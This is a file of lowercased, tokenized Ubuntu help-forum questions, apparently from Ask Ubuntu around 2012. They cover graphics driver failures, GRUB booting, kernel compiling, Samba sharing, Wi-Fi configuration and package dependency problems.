105377	accidentally replaced notifiy-osd with xfce-notifyd , how do i fix it ?	the day before yesterday , after an update , gwibber notifications got screwed a bit ( once i log in , they appear in bulk , for 2 seconds only while before they used appear one by one and each notification lasted 5 seconds ) . anyway , after the same update , top panel notification dialogs changed their background color from gray ( ambiance default color ) to whitey very light grey . i ca n't spot where in compiz settings i can tweak this . i only can set the transparency values for items like nautilus , dialogs , menus ... . but no background stuff. ) . someone has a clue ? how can i set the top panel notifiations background color back to default ? first i thought it was only gwibber , but it applies to any app ( firefox , banshee ... .etc ) . thanks in advance .
105380	ati card dual monitor not working	edit : the setup which it stays at is the last one , multi-display desktop with display ( s ) 2 . this is the problem : with an ati videocard , i set up dual monitor with the driver 's own program . however , for some reason , the top ~200px is n't displayed and at the down ~200px there is only a black line , but only for one monitor . also , somehow , even after applying , the setup does not change anything ( even after restart ) . how can this be solved ? update : when it is set to both monitors display the same , there is no black line , but when it is set to different , there is . and it still seems that applying does not work fine .
105381	when i boot computer has only a black display	i have installed ubuntu 11.10 64x beside windows 7 . when i start the computer , i have to choose between the operating systems , but when i choose ubuntu , the display is black , only the cursor is visible . i am able to log in , and i can hear the sound , but the display is black . but when i start ubuntu in recovery mode , and i choose `` normal start '' it works . i have installed ubuntu again , but i have the same problem . i know , that the driver for my ati radeon are not installed . when i want to update them it works , but when i restart they are gone . please help me
105384	recompiling ubuntu stock kernel	i want to recompile the stock ubuntu kernel ( on oneiric ) with just one change : include usbcore as a kernel module so it can be reloaded at runtime ( i have some issue with usb support crashing at certain times and want to avoid rebooting ) . i am following these instructions . i had/have two issues : i have already found out from the docs of kernel-package , that instead of what above instructions suggest , i should apparently be using the -- append-to-version flag of make-kpkg to give a custom name for my compiled kernel ( instead of just -- revision ) . as i said i want to start of with all the default settings like in the ubuntu stock kernel . when i start from the sources in the ubuntu package linux-source-3.0.0 and just call make menuconfig , will i be presented with the ubuntu stock configuration , or some other defaults ( mainline ? ) . should i then be rather copying a default configuration from somewhere else ( e.g . /boot/config- ... ) ? cheers , nikolaus
105385	help ! booting ubuntu off portable hdd , lots of issues with grub	i am new to linux . i recently installed ubuntu desktop 11.10 onto my portable hard drive . much to my surprise , it installed half of grub to the pc , and half to the phdd . the pc does not belong to me . grub got removed from the pc , but that 's not the issue . i want to be able to boot ubuntu from my phdd on any pc . i share one windows xp pc with my family , but the bios is locked and i can not change the boot order , so i installed plop and added it to the windows boot menu . i do n't want to need the boot disc to boot . i just want to be able to have ubuntu boot when i boot from the external drive . i am not installing anything or changing anything on a pc . i do n't want grub on my pc . i can not open up my pc and remove the internal hdd . i can not boot ubuntu from my phdd as it is . all i want is truly portable ubuntu . if there is a way to have some kind of bootloader that only needs to be on the portable hdd , maybe one that works with plop , it would be much appreciated . i may have to add more details later . thank you .
105387	how to install amarok 1.4 on ubuntu 11.10	i want to install amarok 1.4 on ubuntu 11.10 . i have done it before on kubuntu 9.10 , through some additional repository , but i am unable to locate such a repository for ubuntu 11.10 .
105391	how to reduce tcp latency for gaming ?	i use ubuntu for gaming . in competitive gaming every millisecond matters . i know that many people who use windows use something called leatrix latency fix which is basically a script that modify tcpackfrequency . this reduce the online gaming latency by increasing the frequency of tcp acknowledgements sent to the game server . on mac os x you can get this effect by running sudo sysctl -w net.inet.tcp.delayed_ack=0 . i 've heard that the linux kernel have a very advanced ip stack and can use many different tcp congestion avoidance algorithm . i do n't know if that has anything to do with tcp acknowledge frequency . i also heard that the linux kernel auto-adjusts tcp/ip settings for optimal performance . is there anything i can do to reduce tcp/ip latency ?
105395	make fails because it does n't know `` headers_install ''	i 'm trying to setup buildroot for cross-compiling a custom app . / # uname -a linux venus 2.6.12.6-venus # 323634 wed may 25 13:40:36 cst 2011 mips unknown so far i chose kernel version 2.6.12.6 in buildroot . now i 've got the problem that the make command fails yelling that the rule headers_install is unknown . here is the compleat output : ~/buildroot-2011.11 $ make ( cd /root/buildroot-2011.11/output/toolchain/linux-2.6.12.6 ; \ /usr/bin/make -j2 arch=mips \ hostcc= '' /usr/bin/gcc '' hostcflags= '' '' \ hostcxx= '' /usr/bin/g++ '' \ install_hdr_path=/root/buildroot-2011.11/output/toolchain/linux headers_install ; \ ) make [ 1 ] : entering directory `/root/buildroot-2011.11/output/toolchain/linux-2.6.12.6' makefile:485 : .config : datei oder verzeichnis nicht gefunden make [ 1 ] : *** keine regel , um âťheaders_installâť zu erstellen . schluss . make [ 1 ] : leaving directory `/root/buildroot-2011.11/output/toolchain/linux-2.6.12.6' make : *** [ /root/buildroot-2011.11/output/toolchain/linux/.configured ] fehler 2 i think the problem is that this old kernel does n't have this option in its makefile . what should i do ? i took a look at the 3.2.6 kernel makefile . i found there : headers_install : __headers $ ( if $ ( wildcard $ ( srctree ) /arch/ $ ( hdr-arch ) /include/asm/kbuild ) , , \ $ ( error headers not exportable for the $ ( srcarch ) architecture ) ) $ ( q ) $ ( make ) $ ( hdr-inst ) =include $ ( q ) $ ( make ) $ ( hdr-inst ) =arch/ $ ( hdr-arch ) /include/asm $ ( hdr-dst ) that seems to call a second makefile called makefile.headersinst . but what does that one do ? i tried to use the makefile and the scripts directory of the new kernel 3.2.6 by replacing the old one . here is the output : # make ( cd /root/buildroot-2011.11/output/toolchain/linux-2.6.12.6 ; \ /usr/bin/make -j2 arch=mips \ hostcc= '' /usr/bin/gcc '' hostcflags= '' '' \ hostcxx= '' /usr/bin/g++ '' \ install_hdr_path=/root/buildroot-2011.11/output/toolchain/linux headers_install ; \ ) make [ 1 ] : entering directory `/root/buildroot-2011.11/output/toolchain/linux-2.6.12.6' chk include/linux/version.h hostcc scripts/basic/fixdep hostcc scripts/unifdef makefile:1059 : *** headers not exportable for the mips architecture . schluss . make [ 1 ] : leaving directory `/root/buildroot-2011.11/output/toolchain/linux-2.6.12.6' make : *** [ /root/buildroot-2011.11/output/toolchain/linux/.configured ] fehler 2 no idea what i can try now .
105398	record audio from skype on vps ?	i have impossible task to do ! going crazy ! on fresh ubuntu server 10.04. install , via ssh i 've installed desktop and vnc server . then skype . problem is that ubuntu is vps ! and it do n't have physical sound card . i have tried everything that google searching suggested , no luck ! for windows system there is virtual audio cable , that would make my life easier , but is there any solution for ubuntu ? some said that jack is solution , but i ca n't find any step by step tutorial . i need to record skype output ! and `` play audio file '' to skype input ( mic ) . please help !
105399	change the whole system to hebrew , not only keyboard	what is the way to make ubuntu in hebrew , after i installed it ?
105400	how to disable the grouping of windows on the launcher ?	for example , i ran firefox and opened askubuntu . then opened some link in a new window . as a result , i have two windows of firefox and one icon of firefox on the launcher . i want to have an icon for each opened window . how do i do ?
105403	what is proper formatting of xorg.conf file and what improper can do ?	basically the title explains it . i was editing the xorg.conf file to make use of a multitouch driver and everything was fine , but when i added a certain option option `` swiperightbutton '' `` mod4+left '' `` 10 '' i could only boot to a purple screen . when i tried to go into recovery i could not navigate any of the menus . i 'm currently in the process of a fresh install .
105407	deja dup backup will not launch	i am running ubuntu 11.10 with deja-dup ( 22.0~bzr1290.37~oneiric1 and duplicity 0.6.15-0ubuntu2 . my problem is it is no longer running any backups . it just `` quit '' . if i goto the unity dash and click on the icon , nothing happens . i have un-installed both , re-booted , re-installed , re-booted and still nothing is happening . anyone have any idea as to what has happened , and/or what can i do to get it back to working order . it was working , and doing incremental backups on a set schedule . but no more .
105409	toshiba a505 laptop looses all settings upon reboot	removed w7 and installed 11.04 i had tried the live cd before committing to do a full install and everything worked fine . all the problem issues were never a problem because it worked out of the box . after the install and setting the user configuration i allowed the dist-upgrade and of coarse did all the little tweaks , as i wanted to get the desktop `` just right '' . it was perfect until i rebooted the first time , after setting up the desktop . now all the configuration is gone . once more i resort to make the desktop perfect and usable . again , after reboot , those settings/configuration is lost . edit : default configuration , no separated `` / '' `` /home '' just installed all to one partition . thanks in advance for your answers .
105412	dvd playback prohibited by area limitations	need to shrink 8.5gb dvd to 4.7gb and burn a dvd with ntsc format . sounds simple right ? i have tried several ways and combined different apps without success . i have used different media dvd/rw+ dvd/r- and different brands . the dvd player keeps saying `` playback prohibited by area limitations '' . i know the dvd burner/player region code is correct . here is my arsenal of applications i have used : acidrip dvd ripper , arista transcoder , which does n't work right because of a bug ! , avidmux ( gtk ) , bombono dvd , brasero , devede , dvd95 , dvd : :rip , handbrake , k3b , nero linux and winff
105416	warning : all packages have been deleted from this repository	i have visited several repositories which have that statement . what is really going on . edit : to clarify the question . if the repository does n't exist , where did they move it to ? how do i fix getting the stable repository ? because when i use the link provided at that page it gives me this : not allowed here sorry , you do n't have permission to access this page . here 's and example : http : //www.ubuntuupdates.org/ppas/14 when you arrive this is what you get
105421	upgrade of nvidia graphics adapter fails on lucid lynx , low resolution only , no driver ?	i run two ubuntu distros ( & two ms systems ) on the same hardware . -computer- intel core 2 quad cpu @ 2.66ghz ; 8192mb ; lga 775 nvidia nforce 780i sli ftw i recently upgraded the graphics adapter from nvidia gtx260 to gtx 560 ti/pci/sse2 . i did this by dropping the nvidia proprietary drivers before the hardware change . the 10.10 maverick ubuntu worked well , but the 10.04 lucid failed with a message saying no nvidia drivers found and suggested checking logs . the 10.10 was a clean install , the 10.04 was an upgrade . the broken lucid system will run in reduce graphics mode . graphics is far outside my ken , so i could use some help or advice . note the mainboard uses an nvidia chipset ( 780i ) from kern.log : ⋯ feb 14 16:55:56 worksta64 kernel : [ 41.135780 ] nvidia : module license 'nvidia ' taints kernel . feb 14 16:55:56 worksta64 kernel : [ 41.135788 ] disabling lock debugging due to kernel taint feb 14 16:55:56 worksta64 kernel : [ 41.203759 ] ext3 fs on sdb1 , internal journal feb 14 16:55:56 worksta64 kernel : [ 41.491117 ] acpi : pci interrupt link [ aaza ] enabled at irq 20 feb 14 16:55:56 worksta64 kernel : [ 41.491122 ] hda intel 0000:00:0f.1 : pci int b - > link [ aaza ] - > gsi 20 ( level , low ) - > irq 20 feb 14 16:55:56 worksta64 kernel : [ 41.491124 ] hda_intel : disable msi for nvidia chipset feb 14 16:55:56 worksta64 kernel : [ 41.491237 ] hda intel 0000:00:0f.1 : setting latency timer to 64 feb 14 16:55:56 worksta64 kernel : [ 41.692721 ] acpi : pci interrupt link [ axv5 ] enabled at irq 16 feb 14 16:55:56 worksta64 kernel : [ 41.692725 ] alloc irq_desc for 16 on node -1 feb 14 16:55:56 worksta64 kernel : [ 41.692727 ] alloc kstat_irqs on node -1 feb 14 16:55:56 worksta64 kernel : [ 41.692732 ] nvidia 0000:03:00.0 : pci int a - > link [ axv5 ] - > gsi 16 ( level , low ) - > irq 16 feb 14 16:55:56 worksta64 kernel : [ 41.692739 ] nvidia 0000:03:00.0 : setting latency timer to 64 feb 14 16:55:56 worksta64 kernel : [ 41.692743 ] vgaarb : device changed decodes : pci:0000:03:00.0 , olddecodes=io+mem , decodes=none : owns=io+mem feb 14 16:55:56 worksta64 kernel : [ 41.692774 ] nvrm : the nvidia gpu 03:00.0 ( pci id : 10de:1200 ) installed feb 14 16:55:56 worksta64 kernel : [ 41.692775 ] nvrm : in this system is not supported by the 195.36.24 nvidia linux feb 14 16:55:56 worksta64 kernel : [ 41.692776 ] nvrm : graphics driver release . please see 'appendix a - feb 14 16:55:56 worksta64 kernel : [ 41.692777 ] nvrm : supported nvidia gpu products ' in this release 's readme , feb 14 16:55:56 worksta64 kernel : [ 41.692777 ] nvrm : available on the linux graphics driver download page at feb 14 16:55:56 worksta64 kernel : [ 41.692778 ] nvrm : www.nvidia.com . feb 14 16:55:56 worksta64 kernel : [ 41.692784 ] nvidia : probe of 0000:03:00.0 failed with error -1 feb 14 16:55:56 worksta64 kernel : [ 41.692873 ] nvrm : the nvidia probe routine failed for 1 device ( s ) . feb 14 16:55:56 worksta64 kernel : [ 41.692875 ] nvrm : none of the nvidia graphics adapters were initialized ! ⋯ from syslog/messages : ⋯ feb 14 16:33:32 worksta64 kernel : [ 667.982856 ] nvidia : module license 'nvidia ' taints kernel . feb 14 16:33:32 worksta64 kernel : [ 667.982860 ] disabling lock debugging due to kernel taint feb 14 16:33:33 worksta64 kernel : [ 668.742313 ] acpi : pci interrupt link [ axv5 ] enabled at irq 16 feb 14 16:33:33 worksta64 kernel : [ 668.742324 ] nvidia 0000:03:00.0 : pci int a - > link [ axv5 ] - > gsi 16 ( level , low ) - > irq 16 feb 14 16:33:33 worksta64 kernel : [ 668.742335 ] vgaarb : device changed decodes : pci:0000:03:00.0 , olddecodes=io+mem , decodes=none : owns=io+mem feb 14 16:33:33 worksta64 kernel : [ 668.742432 ] nvrm : the nvidia gpu 03:00.0 ( pci id : 10de:1200 ) installed feb 14 16:33:33 worksta64 kernel : [ 668.742433 ] nvrm : in this system is not supported by the 195.36.24 nvidia linux feb 14 16:33:33 worksta64 kernel : [ 668.742434 ] nvrm : graphics driver release . please see 'appendix a - feb 14 16:33:33 worksta64 kernel : [ 668.742435 ] nvrm : supported nvidia gpu products ' in this release 's readme , feb 14 16:33:33 worksta64 kernel : [ 668.742436 ] nvrm : available on the linux graphics driver download page at feb 14 16:33:33 worksta64 kernel : [ 668.742436 ] nvrm : www.nvidia.com . feb 14 16:33:33 worksta64 kernel : [ 668.742443 ] nvidia : probe of 0000:03:00.0 failed with error -1 feb 14 16:33:33 worksta64 kernel : [ 668.742463 ] nvrm : the nvidia probe routine failed for 1 device ( s ) . feb 14 16:33:33 worksta64 kernel : [ 668.742464 ] nvrm : none of the nvidia graphics adapters were initialized ! ⋯ from xorg.failsafe.log ( selected ) : ⋯ ( ii ) module glx : vendor= '' nvidia corporation '' compiled for 4.0.2 , module version = 1.0.0 module class : x.org server extension ( ii ) nvidia glx module 195.36.24 thu apr 22 19:52:00 pdt 2010 ( ii ) loading extension glx ⋯ ( ii ) vesa ( 0 ) : initializing int10 ( ii ) vesa ( 0 ) : bad v_bios checksum ( ii ) vesa ( 0 ) : primary v_bios segment is : 0xc000 ( ii ) vesa ( 0 ) : vesa bios detected ( ii ) vesa ( 0 ) : vesa vbe version 3.0 ( ii ) vesa ( 0 ) : vesa vbe total mem : 14336 kb ( ii ) vesa ( 0 ) : vesa vbe oem : nvidia ( ii ) vesa ( 0 ) : vesa vbe oem software rev : 112.36 ( ii ) vesa ( 0 ) : vesa vbe oem vendor : nvidia corporation ( ii ) vesa ( 0 ) : vesa vbe oem product : gf104b board - 10400050 ( ii ) vesa ( 0 ) : vesa vbe oem product rev : chip rev ( ii ) vesa ( 0 ) : creating default display subsection in screen section `` default screen '' for depth/fbbpp 24/32 ( == ) vesa ( 0 ) : depth 24 , ( -- ) framebuffer bpp 32 ( == ) vesa ( 0 ) : rgb weight 888 ( == ) vesa ( 0 ) : default visual is truecolor ( == ) vesa ( 0 ) : using gamma correction ( 1.0 , 1.0 , 1.0 ) ( ii ) loading sub module `` ddc '' ( ii ) loadmodule : `` ddc '' ( ii ) module `` ddc '' already built-in ( ii ) vesa ( 0 ) : vesa vbe ddc supported ( ii ) vesa ( 0 ) : vesa vbe ddc level 2 ( ii ) vesa ( 0 ) : vesa vbe ddc transfer in appr . 1 sec . ⋯ ( ee ) failed to initialize glx extension ( compatible nvidia x driver not found ) ⋯ from apt history.log : ⋯ start-date : 2012-02-14 16:15:57 upgrade : libldap-2.4-2 ( 2.4.21-0ubuntu5.6 , 2.4.21-0ubuntu5.7 ) , base-files ( 5.0.0ubuntu20.10.04.4 , 5.0.0ubuntu20.10.04.5 ) , php5 ( 5.3.2-1ubuntu4.11 , 5.3.2-1ubuntu4.14 ) , libapache2-mod-php5 ( 5.3.2-1ubuntu4.11 , 5.3.2-1ubuntu4.14 ) , php5-gd ( 5.3.2-1ubuntu4.11 , 5.3.2-1ubuntu4.14 ) , firefox-branding ( 10.0+build1-0ubuntu0.10.04.2 , 10.0.1+build1-0ubuntu0.10.04.1 ) , firefox ( 10.0+build1-0ubuntu0.10.04.2 , 10.0.1+build1-0ubuntu0.10.04.1 ) , atop ( 1.23-1 , 1.23-1+squeeze1build0.10.04.1 ) , libssl-dev ( 0.9.8k-7ubuntu8.6 , 0.9.8k-7ubuntu8.8 ) , firefox-3.0-gnome-support ( 10.0+build1-0ubuntu0.10.04.2 , 10.0.1+build1-0ubuntu0.10.04.1 ) , firefox-locale-en ( 10.0+build1-0ubuntu0.10.04.2 , 10.0.1+build1-0ubuntu0.10.04.1 ) , libservlet2.5-java ( 6.0.24-2ubuntu1.9 , 6.0.24-2ubuntu1.10 ) , boot-sav ( 3.16-0ppa4~lucid , 3.17-0ppa2~lucid ) , firefox-3.0 ( 10.0+build1-0ubuntu0.10.04.2 , 10.0.1+build1-0ubuntu0.10.04.1 ) , firefox-3.5 ( 10.0+build1-0ubuntu0.10.04.2 , 10.0.1+build1-0ubuntu0.10.04.1 ) , libssl0.9.8 ( 0.9.8k-7ubuntu8.6 , 0.9.8k-7ubuntu8.8 ) , media-player-info ( 12-1~lucid1 , 16-1~lucid1 ) , openssl ( 0.9.8k-7ubuntu8.6 , 0.9.8k-7ubuntu8.8 ) , php5-mysql ( 5.3.2-1ubuntu4.11 , 5.3.2-1ubuntu4.14 ) , php5-common ( 5.3.2-1ubuntu4.11 , 5.3.2-1ubuntu4.14 ) , firefox-gnome-support ( 10.0+build1-0ubuntu0.10.04.2 , 10.0.1+build1-0ubuntu0.10.04.1 ) , libldap2-dev ( 2.4.21-0ubuntu5.6 , 2.4.21-0ubuntu5.7 ) end-date : 2012-02-14 16:18:49 ⋯ start-date : 2012-02-14 16:39:35 purge : nvidia-173-dev ( 173.14.22-0ubuntu11 ) , nvidia-173 ( 173.14.22-0ubuntu11 ) , nvidia-current ( 195.36.24-0ubuntu1~10.04.1 ) , nvidia-glx-173-dev ( 173.14.22-0ubuntu11 ) , nvidia-173-kernel-source ( 173.14.22-0ubuntu11 ) , nvidia-glx-173 ( 173.14.22-0ubuntu11 ) , nvidia-settings ( 195.36.08-0ubuntu2 ) end-date : 2012-02-14 16:41:35 ⋯ start-date : 2012-02-14 16:42:06 end-date : 2012-02-14 16:42:15 ⋯ start-date : 2012-02-14 16:46:19 install : nvidia-current ( 195.36.24-0ubuntu1~10.04.1 ) , nvidia-settings ( 195.36.08-0ubuntu2 ) end-date : 2012-02-14 16:47:56
105423	disabling macbook auto-dimming	i was toying around with different kernels on my macbook pro , and during the process my xorg.conf got wiped out . after i rebooted with a more recent kernel , and re-installed the nvidia driver , i found my screen brightness will change , seemingly randomly . it normally seems to happen after i resume from suspend , or when i open the system- > administration- > nvidiaa x server settings app while plugged in . the brightness will start super bright if i 'm in a dim room , or super dim if i 'm in a bright room . this normally would n't be a problem , but the brightness is usually too extreme , making the screen painful to look at in either scenerio . even more frustrating , if i manually set a brightness , it 'll reset it a few minutes later . i unchecked the `` auto-dimming '' option in system- > preferences- > power management , but it still occurs . how do i disable this feature ?
105429	i get a desktop but no icons or menu	i see the ubuntu 11.10 and the back ground but nothing else . this is an older toshiba running dual boot with windows xp . the cursor moves but i see nothing else on the screen . this is my first try with ubuntu , any help would be greatly appreciated .
105436	customize gnome-panel in openbox ?	i 'm running gnome/openbox and i was able to load gnome-panel , which is great , but for some reason i ca n't right-click on it ( i can , but nothing happens ) and i do n't see any other way to customize my panels . any tips on how to get the panel configuration ?
105437	strange screen after boot loader ?	after the boot loader completes the screen goes to the following image ! my vga : xfx geforce 9600 gso 1.5g what should i do ? i reinstalled 11.10 , 11.04 and 12.04 but i have my problem yet ! another point is that i install ubuntu file system in another partition . maybe some wrong config file is still in my home folder . in my opinion it 's not about driver problem because i have 11.10 with driver without any problem and i think this problem occurs when i try ubuntu 10.04 live cd ! i try ubuntu 12.04 final release too ! and the same problem occurred !
105444	npviewer.bin no longer listed in the process list	since the most recent updates of chrome , npviewer.bin is no longer listed in the process list when a flash content is loaded . what process does chrome use now ? ** edit ** this is google chrome 17.0.963.56 , and i usually kill the process when it uses too much memory or invoke scanmem on it to search for some values
105453	11.10 slow graphic performance with ati switchable graphics when using virtualbox	i am using 11.10 ( on virtuabox ) on a brand new samsung series 7 with switchable graphics , which i am assuming that could be part of the issue here . the graphics card is integrated intel / and an ati 6750m with 1 gigabyte of vram . i have virtualbox ( on windows 7 ) set to the maximum performance setting so that it always kicks on the ati card . i have virtualbox set to use 128 mb ( the maximum ) of vram . almost all of the graphics are slow , if i launch terminal it will take 5 or 6 seconds to even launch . if i type into the terminal , it will take 5 seconds or so for the characters to appear . has anyone else had any issues with this ?
105457	script that checks for newly installed software	is there some service or event that is created when the deb installer installs new software ? i want to create desktop shortcuts everytime a new app is installed . i know how to do the shortcut , i just want to know if there is an event i can tie to that part of the script .
105461	mirror ubuntu desktop onto ps3 via wifi ( dlna etc )	i 'm looking to mirror my ubuntu destop onto my tv by using my ps3 . all done via wifi . similar to the 'airplay mirroring ' in mac os x mountain lion . http : //www.apple.com/macosx/mountain-lion/features.html # airplay is this possible ? how would i go about it . to be clear , i do n't want to share movies in particular , rather to send my screen exactly as i see it .
105469	is there a replacement for fences ?	is there a replacement for the fences application for ubuntu 11.10 ? fences lets you organize the icons and application shortcuts on the desktop by creating containers for the desktop icons . it is different from folderview . folderview shows the contents of the folder in a container but fences lets you organize the desktop icons into a container .
105471	white text on white background problem	i am not sure what happened , but i 'm running ubuntu 11.10 and it is unusable right now because of the white text on white background problem as seen in the screenshot . does anyone know how to fix this ?
105473	samba network sharing ntfs drives and root permissions from local drives	i 'm able to share my internal 2ndry ntfs drives ( sdb1,2 and 3 ) on the network with windows computers now but even though samba read/write is enabled , windows network computers can only open files `` read-only '' and ca n't save files to the samba shared drives/folders . i try to set permissions in ubuntu via folder and/or file properties even logged in root via nautilus but all the samba shared folders and files are set as owner = root , accessible and does not allow me to change them to read/write , it just resets to root , accessible , in other words , i ca n't change permissions . i 'm running ubuntu 11.04 gnome on an old dell dimension 2400 . also , in order to for me to copy or move any files from the ubuntu drive to the sdb1,2 or 3 drives , i have to gksu nautilus . this consequently prevents me from copying .iso files to my `` multisys '' thumb drive too .
105478	why does ubuntu take up so much power ?	when i was on windows , my battery lasted 3 hours with all the crap i had open , fresh ubuntu lasts for only an hour ! what the heck ! how do i fix this ?
105490	ca n't connect to wifi via wpa_supplicant	i 've searched in different forums how to connect to a wpa network with the terminal but none of the seems to work in the network managager file `` /etc/networkmanager/system-connections/elhackerderivendel '' i have : [ connection ] id=elhackerderivendel uuid=2ec1e3d4-31ea-4d08-9aa4-6afc82324186 type=802-11-wireless timestamp=1322936420 [ 802-11-wireless ] ssid=elhackerderivendel mode=infrastructure mac-address=ac:81:12 : bb:28 : e security=802-11-wireless-security [ 802-11-wireless-security ] key-mgmt=wpa-psk psk=aaaaaaaaaaaaaaaa # this is not my real password as you can expect [ ipv4 ] method=auto [ ipv6 ] method=auto and on the other hand iwconfig tells me - device : wlan0 [ elhackerderivendel ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : brcmsmac state : connected default : yes hw address : ac:81:12 : bb:28:0e capabilities : speed : 28 mb/s wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes and sudo wpa_cli scan_results selected interface 'wlan0' bssid / frequency / signal level / flags / ssid 00:0e:2e : c2:11:00 2462 188 [ wpa2-psk-ccmp-preauth ] [ ess ] elhackerderivendel 00:0b:3b : cc:95 : e4 2427 177 [ wpa2-psk-ccmp ] [ wps ] [ ess ] elhackerderivendel any idea of what to write in the wpa_supplicant.conf ?
105494	activities button does n't work when no windows are open	i am running gnome-shell ( 3.2.1 ) and the super key does n't show the activities overview when i push it . this problem only happens when there are no windows open . i can mouse to the top left and show the activities overview , but not with the super key . it just stopped working recently . i 've disabled the super key shortcut in unity , but that did n't help . i 've played around with the settings in system settings - > keyboard layout - > layouts - > options - > alt/win key behavior , but nothing fixed it . if i go to system settings - > keyboard - > shortcuts , i ca n't bind the super key to the `` show the activities overview '' option under `` system '' . running ubuntu 11.10 any ideas ? thanks
105496	how to fix blury docky icons ?	i 've looked everywhere online , and i can not find an answer to this ... my docky icons are blurry . i currently have the faenza icons enabled on ubuntu 11.10 , and they look great everywhere else on my system . but my icons on docky are blurry . i have removed them all and replaced them . i have closed docky , updated docky , restarted my system ; but they are still blurry . any help is greatly appreciated !
105503	how can i print to two printers of the same model without having to reconfigure the model each time ?	i have a printer hp laserjet 1020 installed locally ( usb ) . in my environment , i am having to sometimes use another printers of the same type/model on the same machine ( i.e . just another hp laserjet 1020 ) . so printer driver would be 100 % the same . but if i just unplug the first hp laserjet 1020 and plug another hp laserjet 1020 ( to the same usb port ) it would n't print . i am having to either install it as separate printer or modify existing printer to use another connection . i understand this is rather a `` feature '' allowing to use multiple printers of the same type simultenously . but i really need to be able to use one connection for the same printer model . so i could plug the same printers without re configuring them each time i want to use . i already looked at all possible settings in cupsd.conf and printers.conf and was n't able to find appropriate setting to achieve this .
105505	issues with display brightness control on a samsung r440	i 've got a little problem with my laptop using ubuntu 10.04 , my laptop is a samsung r440 ( i guess with that the specifications stuff will be clear ) with an intel core i3 processor , the issue is that when i try to adjust the screen brightness with the fn + uparrow `` shortcut '' the computer just get totally unresponsive ... is there any solution to this ?
105506	can i get vlc 2.0 mac skin for ubuntu ?	i 'm not a big fan of mac but the new vlc 2.0 for mac looks seriously good . both windows and ubuntu versions suck . so how can i/we make it look good ?
105514	rails & libpq-dev nasty dependencies	i do n't know if this question belongs here , but i 'll take a shot . hi . i 'm running ubuntu 11.10 dual-boot with windows vista on my machine . on ubuntu , i 've installed rvm , rails gem , & postgresql ( the postgres server , client , & other packages like libpq5 , because i installed it via software center ) . i 'm trying to deploy my app on heroku , but seems like i need to install pg gem . i tried to install it , but got this error instead : error : failed to build gem native extension . /home/pcr/.rvm/rubies/ruby-1.9.3-p0/bin/ruby extconf.rb checking for pg_config ... yes using config values from /usr/bin/pg_config you need to install postgresql-server-dev-x.y for building a server-side extension or libpq-dev for building a client-side application . you need to install postgresql-server-dev-x.y for building a server-side extension or libpq-dev for building a client-side application . checking for libpq-fe.h ... * extconf.rb failed * after searching google & stackoverflow for a while , many people said that libpq-dev has to be installed . i tried , via software center but fail do to unmet dependencies . i tried via apt-get , it said that i need libkrb5-dev and krb5-multidev . i tried sudo apt-get install libpq-dev libkrb5-dev krb5-multidev , and got this : the following packages have unmet dependencies : krb5-multidev : depends : libkrb5-3 ( = 1.9.1+dfsg-1ubuntu1 ) but 1.9.1+dfsg-1ubuntu2.1 is to be installed depends : libk5crypto3 ( = 1.9.1+dfsg-1ubuntu1 ) but 1.9.1+dfsg-1ubuntu2.1 is to be installed depends : libgssapi-krb5-2 ( = 1.9.1+dfsg-1ubuntu1 ) but 1.9.1+dfsg-1ubuntu2.1 is to be installed e : unable to correct problems , you have held broken packages . but i already have libkrb5-3 , libk5crypto3 , and libgssapi-krb5-2 ( all with version 1.9.1+dfsg-1ubuntu2.1 ) on my system ! i think maybe the version needed is 1.9.1+dfsg-1ubuntu1 . so , maybe i have to remove the 1.9.1+dfsg-1ubuntu2.1 packages first . do you think it 's safe for me to remove it ? i tried to remove one of them , but software center warns me that it will also remove postgres , openssl-client , smbclient , cups , and many other packages . what should i do to resolve this ? and , is pg gem really necessary to be installed on my local machine to create rails app with postgres as the dbms ? is there a way to `` hand over '' the responsibility to include pg gem to heroku instead ?
105516	3d acceleration under kvm	hey guys i 'm new to kvm and virt-manager . recently i 've been trying testing the new ubuntu 12.04 alpha 2 and found unity3d in a unacceptable speed . after some googleing , i found it may be the kvm-opengl problem . and since i 'm using virt-manager to manage my guest ubuntu under host ubuntu 11.10 64bit , is there any chance to get it work in a acceptable speed ? i see there is qxl\vga\vmvga\xen\cirrus options under the graphic driver selection preference , but qxl and xen is not working to boot up my os . and it seems that vmgl is not working on 64bit os . so i really do n't get a clue how to do so . wish someone could help me out ! thanks for your patience .
105520	invalid argument error while installing ubuntu 11.10	i got this error when i was installing ubuntu directly from cd choosing the option 'inside windows ' [ xp ] , i had tested several times on c drive [ 30 gb free space ] as well as on other drives with minimum 20 gb free space . how can i fix this problem ?
105521	wireshark problem . ca n't select default interface	i downloaded wireshark from the ubuntu 11.10 software center and when i start it and want to select default interface for capture in the list of interfaces are blank . i ca n't select default interface . please help me .
105523	how to connect to internet in ubuntu ?	i have installed ubuntu . i have a pppoe modem through which i use to access the internet on windows . i tried to configure the modem on ubuntu using sudo pppoeconf but it fails and says sorry , i scanned 1 interface , but the access concentrator of your provider did not respond . please check your network and modem cables . another reason or the scan failure may also be another running pppoe process which controls the modem .
105531	how to hide files and folder for windows from ubuntu	in ubuntu i can protect files by hiding them or change the owner and permission . but i am using dual boot ( windows and ubuntu ) , so ubuntu 's hidden files and directories are easily visible from windows . how can i prevent people from viewing my hidden files in windows , or how can i make a file hidden for windows in ubuntu ?
105536	tool to shutdown system when there is no network traffic	i am looking for a script or a tool which i can turn on , when needed , which shuts down my computer if there is e.g . no network traffic for say 10 minutes , or below 100kb for example . would be really handy for automatic downloading . i know there are downsides to this , internet connection is hanging , download program is hanging , so if you have a better idea , please tell me . thanks in advance .
105542	text user interface for fdisk ?	is there a tui for fdisk ? where can i get it from and how can i use it ? i would like one which is in the ubuntu repos
105544	install sinhala unicode pack	ubuntu has the built in sinhala unicode support . but it is not the 'wijesekara ' keyboard layout . ( http : //www.ucsc.cmb.ac.lk/ltrl/services/layout/ ) . how ever 'wijesekara ' type pack is available in the web site ( http : //www.siyabas.lk/sinhala_how_to_install.html ) . but the problem is it is only available for ubuntu 9.04 . i tried to install this package in ubuntu 11.10 . but failed : - ( . what should i do ?
105545	make my laptop a wifi router	i use a software called connecity ( http : //connectify.me/ ) to turn my laptop to a wifi router and provide other devices with internet using my dsl connection . but after i switched to the ubuntu 11.10 i ca n't do this thing . is there any linux software or trick available to do this ?
